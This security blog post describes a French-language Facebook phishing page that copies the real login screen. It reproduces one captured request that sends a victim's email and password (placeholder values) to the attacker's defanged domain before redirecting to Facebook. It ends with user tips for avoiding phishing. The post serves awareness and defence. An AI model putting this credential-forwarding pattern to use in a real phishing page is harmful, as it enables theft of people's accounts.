Today I discovered a new Facebook phishing site targeting French users.  The login page looks identical to the official Facebook site, but the phishing site passes the victims credentials through a submission form before redirecting them to the official Facebook login site.

Fake Facebook Login Page

Source:

source code to phishing page

Connection:

(Passing the victims credentials over to the attacker)

GET hxxp://www.facebook-online.com/next.php?charset_test=%E2%82%AC%2C%C2%B4%2C%EF%BF%BD%2C%EF%BF%BD%2C%3F%2C%3F%2C%3F&locale=fr_FR&email=victim@domain.com&pass=victimpass&pass_placeholder=Mot+de+passe&charset_test=%E2%82%AC%2C%C2%B4%2C%EF%BF%BD%2C%EF%BF%BD%2C%3F%2C%3F%2C%3F

(Redirecting to the official Facebook login page)

302 Moved Temporarily to https://login.facebook.com/login.php

 

Even though this is a run of the mill phishing attack, we have noticed an uptrend of Phishing attacks especially in social networks.  The attackers can do many things with harvested accounts, but one of the most common is to harvest as many accounts as possible before unleashing mass spamvertising or even full blown malware campaigns.

 Tips to Avoid Phishing Attacks on Facebook [Facebook Blog]

  • Remember, Facebook will never ask for your password in
    an email, Facebook message, or any medium that isn't the login page.
    Though you will need to re-enter your password when you set a security
    question, change your contact email, or send a virtual gift.
  • Be extra aware of weird Wall posts. Don't click on any links—on a Wall or elsewhere—if you don't know where they go.
  • Set a security question for yourself on your Account
    page. If somehow something malicious shuts you out of your account, you
    will need the answer to that question in order for our User Operations
    team to let you back in. (If you've already set your security question,
    you won't see a prompt for it on your Account page.)
  • Be extra aware of what website you are using to log in to Facebook
    (and other websites). Phishing websites can be made to look like other
    websites (like the Facebook log in page), and might try to disguise
    their urls. Be smart: www.facebook.com.profile.a
    36h8su2m8.info/login
    starts out looking like a legitimate Facebook website, but that
    a36h8su2m8.info part means it's fraudulent. Set and use a browser
    bookmark to make sure you always log in from facebook.com
  • If you see a Wall post that looks like spam on a friend's Wall, tell the author to delete it and reset their password immediately.
  • Use a modern web browser to benefit from anti-phishing protection
  • Check out opendns.com. This is another method for blocking specific domains that host phishing sites.

Make sure that you have an up-to-date Anti-Malware solution running at all times to prevent Phishing and other types of malicious attacks.